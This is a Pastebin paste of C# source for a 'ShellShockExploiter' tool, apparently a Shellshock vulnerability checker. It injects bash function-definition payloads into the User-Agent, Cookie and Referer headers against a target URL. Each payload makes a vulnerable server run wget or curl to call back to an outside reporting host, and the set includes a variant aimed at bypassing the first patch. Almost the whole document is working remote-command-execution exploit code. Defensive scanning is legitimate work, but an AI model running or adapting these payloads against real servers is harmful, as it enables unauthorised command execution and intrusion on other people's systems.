BrandonPotter

ShellShock.brandonpotter.com

Sep 25th, 2014
8,308
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. using System;
 2. using System.Collections.Generic;
 3. using System.Linq;
 4. using System.Net;
 5. using System.Text;
 6. using System.Threading.Tasks;
 7.  
 8. namespace ShellShockExploiter
 9. {
 10.     public class SSExploiter
 11.     {
 12.         public event Action<string> TestExecuted;
 13.  
 14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
 15.         {
 16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
 17.  
 18.             foreach (var header in headers)
 19.             {
 20.                 // original exploit
 21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
 22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
 23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
 24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
 25.  
 26.                 // new exploit for patch
 27.                 // () { (a)=>\' bash -c "echo date"
 28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
 29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
 30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
 31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
 32.             }
 33.         }
 34.  
 35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
 36.         {            
 37.             ShortWebClient wC = new ShortWebClient();
 38.             string serverResponse = "";
 39.             try
 40.             {
 41.                 wC.Headers.Add(header, bashCmd);
 42.                 wC.DownloadString(targetUrl);
 43.                 serverResponse = "200 OK";
 44.             }
 45.             catch (TimeoutException te)
 46.             {
 47.                 serverResponse = "Timeout";
 48.             }
 49.             catch (WebException e)
 50.             {
 51.                 if (e.Message.Contains("(403) Forbidden"))
 52.                 {
 53.                     serverResponse = "403 Forbidden";
 54.                 }
 55.                 else if (e.Message.Contains("(404) Not Found"))
 56.                 {
 57.                     serverResponse = "404 Not Found";
 58.                 }
 59.                 else
 60.                 {
 61.                     serverResponse = "Error";
 62.                 }
 63.             }
 64.             catch (Exception e) {
 65.                 serverResponse = "No Response or Error";
 66.             }
 67.  
 68.             wC.Dispose();
 69.             wC = null;
 70.  
 71.             try
 72.             {
 73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
 74.             }
 75.             catch { }
 76.         }
 77.     }
 78. }
RAW Paste Data